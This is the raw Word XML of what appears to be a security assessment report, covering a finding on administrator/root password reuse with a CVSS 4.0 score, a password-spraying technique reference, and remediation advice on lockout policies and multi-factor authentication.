          <w:numId w:val="30"/>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B2D38AF">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152CF2AD" w:rsidP="0D325B6E" w:rsidRDefault="152CF2AD" w14:paraId="3DDBC35B" w14:textId="140A9AB6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>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52CF2AD">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4D437207">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">a lockout policy </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2D0FF377">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to b</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="59FDB39D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lock attackers</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2D0FF377">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> after repeated failed login </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2D0FF377">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attempts</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1D6720BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, preventing them from </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="52BE12F7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>brute forcing credentials</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1D6720B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1E90B4E7" w:rsidP="0D325B6E" w:rsidRDefault="1E90B4E7" w14:paraId="2A3137C3" w14:textId="3AC3638A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>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E90B4E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442D2C72">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>multi-factor</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1D70464B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> authentication to prevent access even with leaked or dis</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="39BEF916">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">closed passwords. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="49C2D200" w14:textId="0B038D03">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>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13F1E2B4" w:rsidP="0D325B6E" w:rsidRDefault="13F1E2B4" w14:paraId="1CED002C" w14:textId="002C93C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F1E2B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4008747" w:rsidP="0D325B6E" w:rsidRDefault="44008747" w14:paraId="104B0591" w14:textId="28BF21C5">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:strike w:val="0"/>
          <w:dstrike w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="Rcc5fc4af1c204938">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="44008747">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:strike w:val="0"/>
            <w:dstrike w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>DigiCert - Creating Password Policy Best P</w:t>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="3AC187C0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:strike w:val="0"/>
            <w:dstrike w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ractices</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="1680C384" w:rsidP="0D325B6E" w:rsidRDefault="1680C384" w14:paraId="039147A5" w14:textId="2E7749BB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="R89811eee426f428e">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="1680C384">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Linode - Fail2Ban for SSH Brute-force Protection</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="447C447F" w:rsidP="0D325B6E" w:rsidRDefault="447C447F" w14:paraId="6D80C74F" w14:textId="135E9FE1">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="R66431b36f9224cf3">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="447C447F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Palo Alto Networks - Multi Factor Authentication</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="4653B114" w14:textId="5351D909">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="1CF14DE0" w14:textId="779EFCC6">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="7E0C8D6E" w:rsidP="0D325B6E" w:rsidRDefault="7E0C8D6E" w14:paraId="5C5C1DCB" w14:textId="6D966A17">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc1148880593" w:id="195630433"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7E0C8D6E">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="660000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7E0C8D6E">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C1</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc2018072977" w:id="1010824386"/>
      <w:bookmarkStart w:name="_Toc1359728731" w:id="1906739002"/>
      <w:bookmarkStart w:name="_Toc1557035164" w:id="283294804"/>
      <w:bookmarkStart w:name="_Toc227735506" w:id="733075351"/>
      <w:bookmarkStart w:name="_Toc959802409" w:id="280005929"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="18021F0B">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc239751843" w:id="436456445"/>
      <w:bookmarkStart w:name="_Toc1316204357" w:id="1044713096"/>
      <w:bookmarkStart w:name="_Toc1807472546" w:id="442787536"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="52CC227C">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Administrator/Root Password Reuse</w:t>
      </w:r>
      <w:bookmarkEnd w:id="436456445"/>
      <w:bookmarkEnd w:id="1044713096"/>
      <w:bookmarkEnd w:id="442787536"/>
      <w:bookmarkEnd w:id="1010824386"/>
      <w:bookmarkEnd w:id="1906739002"/>
      <w:bookmarkEnd w:id="283294804"/>
      <w:bookmarkEnd w:id="733075351"/>
      <w:bookmarkEnd w:id="280005929"/>
      <w:bookmarkEnd w:id="19563043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74D223DF">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E03A1B1" w14:textId="2DB3E27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AFAC5DC" w14:textId="4BACEB5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316736" w14:textId="0BA867B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21640E5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DEC8105" w14:textId="0C4D3D1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9A409EE" w14:textId="682F29FB">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5A6A033" w14:textId="188FDAEE">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794B1D2" w14:textId="5656FD08">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7445FEA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ED9067" w14:textId="0DC429F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BBE978E" w14:textId="7D850857">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A73E76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FA840E3"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="09B655B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5DA561" w14:textId="20172AA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C90034F" w:rsidP="0D325B6E" w:rsidRDefault="0C90034F" w14:paraId="242DAFBA" w14:textId="4C7684CA">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" r:id="R514a73b92ed347dc">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0C90034F">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>AV:N</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0C90034F">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>/</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0C90034F">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>AC:L</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0C90034F">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>/</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0C90034F">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>AT:N</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0C90034F">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>/</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0C90034F">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>PR:N</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0C90034F">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>/</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0C90034F">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>UI:N</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0C90034F">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>/</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0C90034F">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>VC:</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r w:rsidRPr="0D325B6E" w:rsidR="0C90034F">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>VI:</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r w:rsidRPr="0D325B6E" w:rsidR="0C90034F">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>VA:</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r w:rsidRPr="0D325B6E" w:rsidR="0C90034F">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>SC:</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r w:rsidRPr="0D325B6E" w:rsidR="0C90034F">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>SI:</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r w:rsidRPr="0D325B6E" w:rsidR="0C90034F">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>SA:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0C90034F">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>H</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="2AD318BB">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EE1F4E5" w14:textId="0029176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2733E08" w:rsidP="0D325B6E" w:rsidRDefault="52733E08" w14:paraId="1897EAE8" w14:textId="0203A155">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52733E08">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32DF0B4" w:rsidP="0D325B6E" w:rsidRDefault="332DF0B4" w14:paraId="008EC0F9" w14:textId="0FCBE3A7">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:u w:val="none"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="Rba4daea314274057">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="332DF0B4">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T1110.003: Password Spraying</w:t>
              </w:r>
